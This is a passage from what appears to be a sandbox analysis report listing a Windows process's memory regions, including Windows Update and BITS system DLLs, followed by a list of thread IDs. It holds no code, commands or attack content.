0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 3501 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 3502 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 3503 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 3504 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 3505 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 3506 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 3507 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 3508 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 3509 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 3510 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3511 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 3512 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 3513 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 3514 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 3515 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 3516 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 3517 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 3518 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 3519 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3520 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 3521 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 3522 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 3523 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 3524 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 3525 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 3526 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3527 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3528 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3529 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3530 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3531 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3532 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3533 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3534 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3535 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3536 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3537 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3538 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3539 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3540 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3541 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3542 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3543 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3544 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3545 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3917 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 3918 start_va = 0xd70000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3919 start_va = 0x1dd0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 3920 start_va = 0x1f40000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 3921 start_va = 0x2900000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 3922 start_va = 0x3280000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 3923 start_va = 0x33a0000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 3924 start_va = 0x3530000 end_va = 0x35affff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 3925 start_va = 0x35d0000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 3926 start_va = 0x56d0000 end_va = 0x574ffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 3927 start_va = 0x5870000 end_va = 0x58effff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 3928 start_va = 0x5e40000 end_va = 0x5f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e40000" filename = "" Region: id = 3929 start_va = 0x7fef5e90000 end_va = 0x7fef5ea5fff entry_point = 0x7fef5e90000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 3930 start_va = 0x3150000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 3931 start_va = 0x3460000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 3932 start_va = 0x5910000 end_va = 0x598ffff entry_point = 0x0 region_type = private name = "private_0x0000000005910000" filename = "" Region: id = 3933 start_va = 0x59f0000 end_va = 0x5a6ffff entry_point = 0x0 region_type = private name = "private_0x00000000059f0000" filename = "" Region: id = 3934 start_va = 0x7fef33e0000 end_va = 0x7fef34b1fff entry_point = 0x7fef33e0000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 3935 start_va = 0x7fef5c00000 end_va = 0x7fef5c09fff entry_point = 0x7fef5c00000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 3936 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 3937 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 3938 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3939 start_va = 0xd50000 end_va = 0xd50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 3940 start_va = 0xd60000 end_va = 0xd60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 3941 start_va = 0x6120000 end_va = 0x619ffff entry_point = 0x0 region_type = private name = "private_0x0000000006120000" filename = "" Region: id = 3942 start_va = 0x7fef5be0000 end_va = 0x7fef5bf1fff entry_point = 0x7fef5be0000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 3943 start_va = 0x5530000 end_va = 0x55affff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 3944 start_va = 0x7fef3390000 end_va = 0x7fef33d4fff entry_point = 0x7fef3390000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 3945 start_va = 0x7fef69c0000 end_va = 0x7fef69d0fff entry_point = 0x7fef69c0000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 3946 start_va = 0x7fef69e0000 end_va = 0x7fef6a43fff entry_point = 0x7fef69e0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3947 start_va = 0x7fef6a50000 end_va = 0x7fef6ac0fff entry_point = 0x7fef6a50000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3948 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 3949 start_va = 0x2e00000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3950 start_va = 0x55e0000 end_va = 0x565ffff entry_point = 0x0 region_type = private name = "private_0x00000000055e0000" filename = "" Region: id = 3951 start_va = 0x7fefb6a0000 end_va = 0x7fefb706fff entry_point = 0x7fefb6a0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3952 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 3953 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 3954 start_va = 0x20d0000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 3955 start_va = 0x2eb0000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 3956 start_va = 0x31d0000 end_va = 0x324ffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 3957 start_va = 0x32a0000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 3958 start_va = 0x3390000 end_va = 0x340ffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 3959 start_va = 0x3500000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 3960 start_va = 0x5830000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x0000000005830000" filename = "" Region: id = 3961 start_va = 0x7fef1420000 end_va = 0x7fef1672fff entry_point = 0x7fef1420000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 3962 start_va = 0x7fef3990000 end_va = 0x7fef399efff entry_point = 0x7fef3990000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 3963 start_va = 0x7fef58c0000 end_va = 0x7fef5930fff entry_point = 0x7fef58c0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3964 start_va = 0x7fef5c10000 end_va = 0x7fef5e89fff entry_point = 0x7fef5c10000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3965 start_va = 0x7fefaa90000 end_va = 0x7fefaaaafff entry_point = 0x7fefaa90000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3966 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 3967 start_va = 0x3580000 end_va = 0x367ffff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 3968 start_va = 0x77ca0000 end_va = 0x77ca6fff entry_point = 0x77ca0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3969 start_va = 0x5d40000 end_va = 0x5d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 3970 start_va = 0x7fefcee0000 end_va = 0x7fefcee7fff entry_point = 0x7fefcee0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 3971 start_va = 0x7fef3380000 end_va = 0x7fef338cfff entry_point = 0x7fef3380000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 4279 start_va = 0xd70000 end_va = 0xd89fff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 4280 start_va = 0xd90000 end_va = 0xd90fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 4281 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 4282 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 4283 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 4284 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 4285 start_va = 0xde0000 end_va = 0xdeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 4286 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 4287 start_va = 0xe00000 end_va = 0xe00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 4288 start_va = 0x11e0000 end_va = 0x11e7fff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 4289 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4290 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4291 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 4292 start_va = 0x1320000 end_va = 0x1320fff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 4293 start_va = 0x14a0000 end_va = 0x14a1fff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 4294 start_va = 0x14b0000 end_va = 0x14b0fff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 4295 start_va = 0x14c0000 end_va = 0x14c7fff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 4296 start_va = 0x14d0000 end_va = 0x14dffff entry_point = 0x14d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4297 start_va = 0x1560000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 4298 start_va = 0x1570000 end_va = 0x157ffff entry_point = 0x1570000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4299 start_va = 0x1580000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 4300 start_va = 0x1620000 end_va = 0x162ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001620000" filename = "" Region: id = 4301 start_va = 0x1630000 end_va = 0x163ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001630000" filename = "" Region: id = 4302 start_va = 0x1640000 end_va = 0x164ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001640000" filename = "" Region: id = 4303 start_va = 0x1650000 end_va = 0x165ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 4304 start_va = 0x1660000 end_va = 0x166ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001660000" filename = "" Region: id = 4305 start_va = 0x1670000 end_va = 0x167ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001670000" filename = "" Region: id = 4306 start_va = 0x1680000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 4307 start_va = 0x1710000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 4308 start_va = 0x18a0000 end_va = 0x18a7fff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 4309 start_va = 0x18b0000 end_va = 0x18bffff entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 4310 start_va = 0x18c0000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 4311 start_va = 0x18d0000 end_va = 0x18d7fff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 4312 start_va = 0x18e0000 end_va = 0x18effff entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 4313 start_va = 0x1e40000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 4314 start_va = 0x2e60000 end_va = 0x2edffff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 4315 start_va = 0x55d0000 end_va = 0x564ffff entry_point = 0x0 region_type = private name = "private_0x00000000055d0000" filename = "" Region: id = 4316 start_va = 0x5c80000 end_va = 0x5d3ffff entry_point = 0x5c80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4317 start_va = 0x5d50000 end_va = 0x5d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 4318 start_va = 0x5d90000 end_va = 0x5dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d90000" filename = "" Region: id = 4319 start_va = 0x5f40000 end_va = 0x603ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 4320 start_va = 0x60a0000 end_va = 0x611ffff entry_point = 0x0 region_type = private name = "private_0x00000000060a0000" filename = "" Region: id = 4321 start_va = 0x61a0000 end_va = 0x629ffff entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 4322 start_va = 0x62a0000 end_va = 0x639ffff entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 4323 start_va = 0x63a0000 end_va = 0x649ffff entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 4324 start_va = 0x6510000 end_va = 0x658ffff entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 4325 start_va = 0x6590000 end_va = 0x668ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006590000" filename = "" Region: id = 4326 start_va = 0x6690000 end_va = 0x678ffff entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 4327 start_va = 0x6790000 end_va = 0x778ffff entry_point = 0x0 region_type = private name = "private_0x0000000006790000" filename = "" Region: id = 4328 start_va = 0x7850000 end_va = 0x78cffff entry_point = 0x0 region_type = private name = "private_0x0000000007850000" filename = "" Region: id = 4329 start_va = 0x7fef0dc0000 end_va = 0x7fef0f93fff entry_point = 0x7fef0dc0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 4330 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 4331 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 4332 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 4333 start_va = 0x18f0000 end_va = 0x18f0fff entry_point = 0x18f0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 4334 start_va = 0x1a00000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4335 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 4336 start_va = 0x3350000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 4337 start_va = 0x7ab0000 end_va = 0x7b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000007ab0000" filename = "" Region: id = 4338 start_va = 0x7b30000 end_va = 0x7f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 4339 start_va = 0x7fef5290000 end_va = 0x7fef530bfff entry_point = 0x7fef5290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 5175 start_va = 0x1a20000 end_va = 0x1a22fff entry_point = 0x1a20000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 5176 start_va = 0x1a30000 end_va = 0x1a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a30000" filename = "" Region: id = 5177 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x1a40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5178 start_va = 0x1e30000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 5179 start_va = 0x3290000 end_va = 0x330ffff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 5180 start_va = 0x7900000 end_va = 0x797ffff entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 5181 start_va = 0x7f30000 end_va = 0x812ffff entry_point = 0x0 region_type = private name = "private_0x0000000007f30000" filename = "" Region: id = 5182 start_va = 0x7fef2a70000 end_va = 0x7fef2a8bfff entry_point = 0x7fef2a70000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 5183 start_va = 0x7fef2a90000 end_va = 0x7fef2af1fff entry_point = 0x7fef2a90000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 5184 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Thread: id = 251 os_tid = 0x70c Thread: id = 252 os_tid = 0x710 Thread: id = 253 os_tid = 0x12c Thread: id = 254 os_tid = 0x6ec Thread: id = 255 os_tid = 0x5fc Thread: id = 256 os_tid = 0x34c Thread: id = 257 os_tid = 0x7bc Thread: id = 258 os_tid = 0x7b8 Thread: id = 259 os_tid = 0x7a8 Thread: id = 260 os_tid = 0x7a4 Thread: id = 261 os_tid = 0x7a0 Thread: id = 262 os_tid = 0x408 Thread: id = 263 os_tid = 0x4b0 Thread: id = 264 os_tid = 0x65c Thread: id = 265 os_tid = 0x654 Thread: id = 266 os_tid = 0x64c Thread: id = 267 os_tid = 0x644 Thread: id = 268 os_tid = 0x640 Thread: id = 269 os_tid = 0x638 Thread: id = 270 os_tid = 0x634 Thread: id = 271 os_tid = 0x62c Thread: id = 272 os_tid = 0x628 Thread: id = 273 os_tid = 0x624 Thread: id = 274 os_tid = 0x620 Thread: id = 275 os_tid = 0x61c Thread: id = 276 os_tid = 0x5f8 Thread: id = 277 os_tid = 0x468 Thread: id = 278 os_tid = 0x44c Thread: id = 279 os_tid = 0x448 Thread: id = 280 os_tid = 0x418 Thread: id = 281 os_tid = 0x134 Thread: id = 282 os_tid = 0x3c4 Thread: id = 283 os_tid = 0x390 Thread: id = 284 os_tid = 0x360 Thread: id = 285 os_tid = 0x2b0 Thread: id = 286 os_tid = 0x3f4 Thread: id = 287 os_tid = 0x3f0 Thread: id = 288 os_tid = 0x3e4 Thread: id = 289 os_tid = 0x3d8 Thread: id = 290 os_tid = 0x388 Thread: id = 291 os_tid = 0x378 Thread: id = 292 os_tid = 0x374 Thread: id = 293 os_tid = 0x370 Thread: id = 294 os_tid = 0x364 Thread: id = 295 os_tid = 0x35c Thread: id = 313 os_tid = 0x7e4 Thread: id = 316 os_tid = 0x7bc Thread: id = 317 os_tid = 0x7a8 Thread: id = 318 os_tid = 0x7d8 Thread: id = 319 os_tid = 0x548 Thread: id = 320 os_tid = 0x594 Thread: id = 321 os_tid = 0x760 Thread: id = 322 os_tid = 0x538 Thread: id = 323 os_tid = 0x464 Thread: id = 324 os_tid = 0x74c Thread: id = 325 os_tid = 0x6a4 Thread: id = 327 os_tid = 0xc4 Thread: id = 328 os_tid = 0xc8 Thread: id = 330 os_tid = 0x248 Thread: id = 331 os_tid = 0x2a8 Thread: id = 332 os_tid = 0x77c Thread: id = 333 os_tid = 0x514 Thread: id = 334 os_tid = 0x630 Thread: id = 335 os_tid = 0x120 Thread: id = 336 os_tid = 0x220 Thread: id = 337 os_tid = 0x640 Thread: id = 338 os_tid = 0x728 Thread: id = 339 os_tid = 0x70c Thread: id = 340 os_tid = 0x3a4 Thread: id = 341 os_tid = 0x670 Thread: id = 342 os_tid = 0x44c Thread: id = 343 os_tid = 0x45c Thread: id = 344 os_tid = 0x75c 